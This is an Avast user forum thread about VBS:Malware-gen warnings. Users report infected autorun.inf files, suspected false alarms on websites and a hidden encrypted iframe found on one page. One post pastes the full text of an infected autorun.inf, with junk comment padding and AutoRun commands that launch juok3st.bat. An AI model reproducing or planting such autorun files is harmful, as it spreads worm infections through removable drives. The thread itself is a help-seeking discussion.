VBS:Malware-gen

[mairy]

Honestly, I got no idea what you're talking about.... This is the very first time something like this happend to me since I got Avast (and tha't like a year and a half...). Am still trying to click on the options but the window still appear over and over again....

Someone please tell me what should I do.... Taking into acount that I got no idea of how the system works and all that... Am just an average user.

[Maxx_original]

folow the threads with INF:Autorun discussion... you can use the search function

[mairy]

I've been searching and there are quite a lot of post about that.... I got absolutly lost... Maybe because of my english, maybe because I don't got much idea about this kind of things...

If you could please give me the instructions, or something.... I'll be thankful

Anyway, I gotta go now, let's if I can fix the problem tomorrow.

Thanks.

[Maxx_original]

can you look at the content of your autorun.inf?

[vlukinius]

Since yesterday me and other avast users get VBS:Malware-gen found on http://www.deliverance-guild.com/ where we use PhPNuke.
I scanned it with http://www.freedrweb.com/browser/mozilla+firefox/ with no detection of anything.
If I download the php file moduels.php and scan it locally I get the same.

A zipped version of the php file is avalible at:
http://www.deliverance-guild.com/erduker/PhPNukeModulesVBSMalware-gen.zip

I belive the is a false detection. Correct me if I am wrong.

[kubecj]

Inside the page there is a encrypted string, containing hidden iframe pointing to counter-google.com. Quick websearch found this site mentioned only in ties with malware.

Hm, it seems that there is a lot of 'stuff' around... 

[mairy]

can you look at the content of your autorun.inf?

This is what it says:

;L7rkJLrfswDfUDdFkq55r1p484okrw2owk3Xl2kakaqeKjk0IqSD73iiiADki3dkloD9S4K25jqL4k0qs3lKlqfKddea
[AutoRun]
;2IsSK4CsLL0ojSrS51sr9eowUi1d3ioa435adSL23dDsOasLp6
open=juok3st.bat
;LwSKs25530Kms3r5JDKXki4sqr2k1ol43JwaLl4jaSDfksLD25faq3Kw297iL262akl4wLilKZ2ffosdkpdiAsiirwi3jdikS7aa7q8a4dA0llJa
shell\open\Command=juok3st.bat
;A43Aw7wfoL2q3a2
shell\open\Default=1
;s4Dr745s5ao30a2kfkr14fs3ikaaowerjwiap3l50DkDLaKDe2md26w2krk1wj9Dd5q72iDAo4lIkKa32akf3qwslL3s7aFAljL4Jk5X
shell\explore\Command=juok3st.bat
;csk0Ciksi3adlKoje73aKoDp1rA4Lo7kq1SdA99iF3nkwsdk6AqO2Jawids4ri50w8paDkAd5p2Hss0Leaa1rdd0a3s

[wxped]

hey,i think i've also a problem with this vbs:malware-gen virus which is that,every new external disk i put my pc,my avast s giving me that warning: "F:/autorun.inf is infected with vbs:malware-gen" and avast isn't deleting it..what must i do?
thanks..

[Hari VS]

Hi, I'm facing the same problem as Mairy. The Avast On-access Scanner keeps popping up with the following message:

File name:          C:\autorun.inf
Malware Name:   VBS:Malware-gen
Malware Type:    Virus/Worm
VPS Version:       080201-1, 02/01/2008

But I'm unable to delete, repair, or move the virus to the chest. It affects all three drive, C:, D: and H: (removable).

A friend recommended using Flash Disinfector, as she had the same problem and it worked for her. But hasn't worked for me.

I'm also using AVG concurrently, and it detected a Funny UST Scandal.avi.exe, which Avast couldn't detect. What would you suggest I do to get rid of them all. Thank you!

Best Regards,
Hari

[rdmaloyjr]

Hi, I'm facing the same problem as Mairy. The Avast On-access Scanner keeps popping up with the following message:

File name:          C:\autorun.inf
Malware Name:   VBS:Malware-gen
Malware Type:    Virus/Worm
VPS Version:       080201-1, 02/01/2008

But I'm unable to delete, repair, or move the virus to the chest. It affects all three drive, C:, D: and H: (removable).

A friend recommended using Flash Disinfector, as she had the same problem and it worked for her. But hasn't worked for me.

I'm also using AVG concurrently, and it detected a Funny UST Scandal.avi.exe, which Avast couldn't detect. What would you suggest I do to get rid of them all. Thank you!

Best Regards,
Hari

Don't use more than one anti-virus with real-time scanning at the same time, they will conflict!  avast! will shut down some or all of it's components to avoid conflict.  Try a boot-time scan with only avast! on your computer.

[bdj]

I see from Jan 24, 2008 that kubecj writes that "This is a obvious false alarm and we're going to fix it ASAP. Sorry for any inconveniece. We've did a major rehaul of the scripting detection and it still has some nuisances."

Has this been fixed and if so how does the Avast world get the update?

My problem is with the resident program. By default the Script Blocking module of the program is running. So when I go to http://pagegravy.com/client_demos/AviationIndustryExpo.html, I am warned that a sample of the VBS:Malware-gen was found. By disabling this module the page loads as normal.

My concern is that I want to place the ad that is in this page on my website. But I can't do this knowing that people with Avast who visit my site will get this warning.

[DavidR]

Well it seems avast isn't alone in detecting something on that page, so does the DrWeb link checker, In file >AviationIndustryExpo.html/javascript.0

So is that the same file avast is alerting on ?

DrWeb link checker, http://online.drweb.com/?url=1

[bdj]

Hey, thanks for the quick response. My vendor has modified the file to keep Avast and other protectors from falsely alerting on the site.

[DavidR]

Thanks for the feedback, no detection nor by DrWeb link checker or avast.

Welcome to the forums.

[woodybolo]

Hi,

same "VBS:Malware-gen" problem with

Code: [Select]

http://www.ziza.ru/


says it's clean

but with Avast no

- Programme : Déjà à jour
  (version actuelle 4.7.1098)
- Vps : Déjà à jour
  (version actuelle 080214-0)

very annoying

thank you for checking